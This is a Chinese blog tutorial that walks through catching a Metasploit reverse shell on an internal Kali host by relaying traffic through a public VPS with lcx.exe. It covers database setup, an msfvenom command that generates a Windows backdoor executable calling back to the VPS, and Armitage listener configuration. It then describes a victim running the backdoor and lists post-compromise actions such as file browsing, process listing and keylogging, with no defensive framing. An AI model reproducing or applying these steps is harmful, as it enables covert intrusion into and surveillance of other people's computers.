公网的Shell如何返回到内网的Kali

    选择打赏方式

测试工具:
        Lcx.exe    端口转发
        Kali 内网环境下的攻击主机
        VPS 公网环境下的用于lcx端口转发
        目标主机  可以是公网/内网下的主机


1.service postgresql start   启动数据库服务器

2.msfdb init                    初始化数据库

3.cat /usr/share/metasploit-framework/config/database.yml  查看数据库链接信息(一会链接会用到)

4.msfconsole 启动msf控制台

5.db_status  查看数据库连接

6.db_connect user:pass@host:port/dbname 链接数据库


以上我们的前期准备工作就完成了,下面我们需要用公网的VPS,进行转发。
-listen 6666 8888 监听8888的数据转发到6666端口



7.msfVENOM -p windows/metre.....  LHOST=host LPORT=prot -f exe >/root/Desktop/test.exe  生成payload
LHOST为VPS的地址,LPORT为lcx.exe的连接端口(这里我们是8888端口)


8.armitage 图形化页面的metasploit

(启动页面)默认配置 直接连接就可以

(软件界面)
我们依次选择 Armitage->listeners->bind 新建一个绑定型的shell 配置如下host为VPS地址,port为lcx的传输端口(这里我们是6666端口)


/*****************************分割线*******************************/
下面我们模拟用户打开我们的后门程序

后门启动后会连接我们VPS的8888端口,监听程序会显示流量,同时他会将流量转发到6666端口

由于Metasploit已经连接到VPS的6666端口,所以接收到VPS转发来的数据,成功返回一台主机shell


对主机一些简单的操作(我做测试的主机在内网,所以通过VPS返回了一个内网的主机)

(浏览文件)

(显示进程)

(键盘记录及其他)


具体怎么发挥就看自己了

msfvenom还可以生成php、asp等多种形式的payload,关于他的一些其他用法可以参考:http://ixuehua.blog.163.com/blog/static/2599520382016447215392/

https://bbs.ichunqiu.com/thread-13496-1-1.html

版权声明:若无特殊注明,本文皆为《 zuoer 》原创,转载请保留文章出处。
本文链接:公网的Shell如何返回到内网的Kali https://www.zuoer.xin/?post=32
正文到此结束

热门推荐

管理员已关闭本篇文章评论!